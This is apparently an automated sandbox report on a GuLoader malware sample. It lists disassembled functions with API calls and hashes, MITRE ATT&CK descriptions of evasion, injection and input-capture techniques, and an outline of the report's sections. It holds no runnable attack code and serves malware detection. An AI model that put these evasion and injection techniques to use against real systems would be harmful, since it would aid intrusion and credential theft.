Function 00A04375, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A04D1E

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d4768f62bc569144143f2aa34b756f42b38ed8354aa1a6530dd3b1f4765d218
Instruction ID: 38d5ea01243f74e2aa4347cce8acc2d8f922b4270d123e0d8b457df9c3e7be46
Opcode Fuzzy Hash: 8d4768f62bc569144143f2aa34b756f42b38ed8354aa1a6530dd3b1f4765d218
Instruction Fuzzy Hash: 0ED097B21083880EE1523E6048022023F202B82300798C08AC1C00B3E2CB014F11A363

Uniqueness

Uniqueness Score: -1.00%

Function 00A04012, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00A03F7E,00A04066,00A00989,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A0402F

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9a625341a02fad1d4ea82b2d5980e6389c007b6970a74ea3d80e828b53d33665
Instruction ID: 8e4f2e9529ce893ede097508fcdadc64202ab6b5e0a5b151008ea3eacb42bd72
Opcode Fuzzy Hash: 9a625341a02fad1d4ea82b2d5980e6389c007b6970a74ea3d80e828b53d33665
Instruction Fuzzy Hash: 2ED012343D03047AF6344620DD5FFD662169B90F41FB04419FB496D4C0A6E1AE548116

Uniqueness

Uniqueness Score: -1.00%

Function 00A01495, Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A04338: LdrInitializeThunk.NTDLL ref: 00A04D1E

Sleep.KERNEL32(00002710,00000000,00000000,?,?,?,?,?,00000000,00000000,00000050,00000369,?,00A06747,000000FF,00000007), ref: 00A015C5

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: e7587baca5695eaf0d7cce3d96d623372d20ec6cf6c14c1d1fa55143bbe77010
Instruction ID: 8af4fa29e57d6f3c2a2a84701a2389c6f5b66897e6e7c58b5bd698f79399c96e
Opcode Fuzzy Hash: e7587baca5695eaf0d7cce3d96d623372d20ec6cf6c14c1d1fa55143bbe77010
Instruction Fuzzy Hash: 2E11ED70A0438DAAEF322F24AD95BDD3B376F81340F900511F9865A09293369A809A02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A01E78, Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

CBz, xrefs: 00A01EBC
CBz, xrefs: 00A01EC1

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: CBz$CBz
API String ID: 1029625771-913202630
Opcode ID: 6bf99a01f6fb000a780f29f47974c7a8d7bf42189ee4726da0c737f5c06bb286
Instruction ID: 93cde28aa8c053db8b784bc6ee709a1b259557099d9ea40c69f4f6582a91202e
Opcode Fuzzy Hash: 6bf99a01f6fb000a780f29f47974c7a8d7bf42189ee4726da0c737f5c06bb286
Instruction Fuzzy Hash: A5E1677170070AAFDB149F28DDD4BE6B3A5BF09350F554229EC99972C0CB35AC95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A01EB9, Relevance: 1.9, Strings: 1, Instructions: 619COMMON

Download Yara Rule

Strings

CBz, xrefs: 00A01EC1

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID: CBz
API String ID: 0-4278345518
Opcode ID: 6e382e20c4db989ed9fb82ffabaaf2272acfbac6454c15a2a5cfa4536a066c7a
Instruction ID: 5df55add13f4cc119d08df1483ec400e9c3dd46d9f423647e70c6977a14cda60
Opcode Fuzzy Hash: 6e382e20c4db989ed9fb82ffabaaf2272acfbac6454c15a2a5cfa4536a066c7a
Instruction Fuzzy Hash: 4412467174030AAFEF204F24ED95BD97766BF09344F658229FD88972C0C7B9A8958B80

Uniqueness

Uniqueness Score: -1.00%

Function 00A0773F, Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

uBLs, xrefs: 00A077E8

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: uBLs
API String ID: 3389902171-2608592531
Opcode ID: 45c3672e8e2d261edcd85e8a2f226a75f6d091cb6d937258a3b5bd218f0c8367
Instruction ID: 9566a1ada3d206b9822083d1140c38d13489d3ca625c8166f53dd077796f49b9
Opcode Fuzzy Hash: 45c3672e8e2d261edcd85e8a2f226a75f6d091cb6d937258a3b5bd218f0c8367
Instruction Fuzzy Hash: 3D91E834E0834A8EEB25DB3895D475DBBE29F53360F54C299C9E68B2D6D334D882C712

Uniqueness

Uniqueness Score: -1.00%

Function 00A027EC, Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43644918428af7a1a7028980346105933b772ac47bc6b0e7ecba4c6fd055fcad
Instruction ID: 10a02bfeb10f8134b3dd295f5135961920c0e2f360cb2a10e5b77694d947e438
Opcode Fuzzy Hash: 43644918428af7a1a7028980346105933b772ac47bc6b0e7ecba4c6fd055fcad
Instruction Fuzzy Hash: 0BE1447128030DAFFF201F14ED9ABE9366AFF15740FA08125FE859B1D1C7B899859B05

Uniqueness

Uniqueness Score: -1.00%

Function 00A01F55, Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16760faba1c8ee90e97b5925bb124ad8ca4364ad876c2f4635744ba9ef7327b
Instruction ID: 079b90e6e31fd053ad54252ef2b83ace109416d5941883b0f542a21d2604a96c
Opcode Fuzzy Hash: c16760faba1c8ee90e97b5925bb124ad8ca4364ad876c2f4635744ba9ef7327b
Instruction Fuzzy Hash: CF81127170070BAFEB158F28EDD4BD6B3A6BF09354F158229EC9883281D775AC95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A01FFD, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d27dd9360bbdd6f9fc79dbd019ee33afac32117936fae74164869c13b77c2f10
Instruction ID: cd3b8f4300f093707fded5db05f5953869c4e0cf082796418696f935700bc093
Opcode Fuzzy Hash: d27dd9360bbdd6f9fc79dbd019ee33afac32117936fae74164869c13b77c2f10
Instruction Fuzzy Hash: C971497170070BAFE7158F28DDD4BD6B3A5BF09354F258229EC9883281D775A895CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A020CD, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fad2f2e7d089ca97b52840a7b2f0cb5efe3300f74ab80b0408cbe85c11aa53c
Instruction ID: 243d780188d9b4cbb9315e63aa8fc9f7fd0f82595f7623d005928a4e361005aa
Opcode Fuzzy Hash: 3fad2f2e7d089ca97b52840a7b2f0cb5efe3300f74ab80b0408cbe85c11aa53c
Instruction Fuzzy Hash: 89517C7130070AAFEB159F28EDD4BD6B3A5BF05350F194329EC95832C1D765E899C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A02141, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a267e798bf380de90187b73845f3571582b31f197926716cc527f0ce675437d
Instruction ID: b1eff283fdfdb0f505d940be0a92a5b629e0f6b48a2313f1ce4d9e0a20d4446b
Opcode Fuzzy Hash: 8a267e798bf380de90187b73845f3571582b31f197926716cc527f0ce675437d
Instruction Fuzzy Hash: A251897130070AAFEB259F28EDD4BD6B3A5BF09350F194229EC99832C1D735E895CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A02889, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2ed95b9a0772ac570608144b8d6566eeaa1f56af9daf982f3e24f9af404aed
Instruction ID: 5e6eb7cd7abbedee6959d55f47fc7058895e2afc36c6e9a51bd2c6ec791448af
Opcode Fuzzy Hash: da2ed95b9a0772ac570608144b8d6566eeaa1f56af9daf982f3e24f9af404aed
Instruction Fuzzy Hash: 8311A73024030DEFEF316B54ADA9BD933A9AF01B50FA54156E9455B0E187B09985CA16

Uniqueness

Uniqueness Score: -1.00%

Function 00A06D85, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4caa10da761455380858b1745c387ca3f380be4d4fd38d3c3c952b014d01fa2f
Instruction ID: 8d0112fe722d8a7cb6573c1eec2d4a5337a56462747389f31fda464d4078696f
Opcode Fuzzy Hash: 4caa10da761455380858b1745c387ca3f380be4d4fd38d3c3c952b014d01fa2f
Instruction Fuzzy Hash: 89F08C75301709CFD319DB28D6E4B6673E6EF69344BA18478E942CB292D734ECA0D620

Uniqueness

Uniqueness Score: -1.00%

Function 00A03977, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d002d22b886a53ac75fa7126098976c034abbd4d4dee65f27ea97334ee95a0aa
Instruction ID: e2976ac406c2ad2d1ce306d6815099c45149849e0959eeac94e97a132718b7f5
Opcode Fuzzy Hash: d002d22b886a53ac75fa7126098976c034abbd4d4dee65f27ea97334ee95a0aa
Instruction Fuzzy Hash: 75C092B7B52680CFFB02CE18C981B4073B1FB12AC4F890490E802CFB12D328ED00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00A0672D, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6766660e7b3379c18bfc58c39008d622dd6500caa21a82757467a60bc5e1f23
Instruction ID: 9513d7e96a74e043ab5f64cad6b498a04984915a88380a8b5a67f9cd33cb06a7
Opcode Fuzzy Hash: d6766660e7b3379c18bfc58c39008d622dd6500caa21a82757467a60bc5e1f23
Instruction Fuzzy Hash: 22B002357556408FDA55CE59D190F4173A4BB54B50B425494A415C7A11C664E900C904

Uniqueness

Uniqueness Score: -1.00%

Function 00A081F1, Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.494899061.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7582bfee7dda0f360e4df1f48c35ddc72d8478214e5726e5a99bb1b8fcf10b
Instruction ID: bf5f5237ffedd86e8e93c8e21d4a9a483944e10a300b8ada9155cd160cf0d34b
Opcode Fuzzy Hash: 5f7582bfee7dda0f360e4df1f48c35ddc72d8478214e5726e5a99bb1b8fcf10b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report yiu0bguw4d

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: yiu0bguw4d.exe PID: 204 Parent PID: 5564

General

Chronological Activities

Analysis Process: RegAsm.exe PID: 6304 Parent PID: 204

Function 004141F4, Relevance: 894.4, APIs: 467, Strings: 42, Instructions: 3662
COMMON

Function 004184F6, Relevance: 114.3, APIs: 60, Strings: 5, Instructions: 518
COMMON

Function 004017E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287
COMMON

Function 0042135A, Relevance: 103.7, APIs: 56, Strings: 3, Instructions: 459
COMMON

Function 0041FC2F, Relevance: 80.9, APIs: 44, Strings: 2, Instructions: 374
COMMON

Function 00420D00, Relevance: 66.4, APIs: 44, Instructions: 415
COMMON

Function 00418DDF, Relevance: 52.8, APIs: 35, Instructions: 272
COMMON

Function 0041FAA7, Relevance: 18.1, APIs: 12, Instructions: 98
COMMON

Function 00420296, Relevance: 13.6, APIs: 9, Instructions: 110
COMMON

Function 0041F9CF, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON